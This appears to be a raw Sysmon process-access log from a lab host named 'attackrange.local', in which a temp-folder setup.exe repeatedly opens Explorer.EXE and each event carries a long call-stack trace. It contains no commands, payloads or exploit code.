13:59:52.474{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015197Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.474{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015196Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.474{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015195Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.474{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015194Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.474{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015193Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.474{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015192Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.474{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015191Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.474{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015190Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.474{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015189Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.474{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015188Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.474{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015187Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.474{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015186Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.474{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015185Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.474{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015184Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.458{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015183Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.458{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015182Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.458{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015181Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.458{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 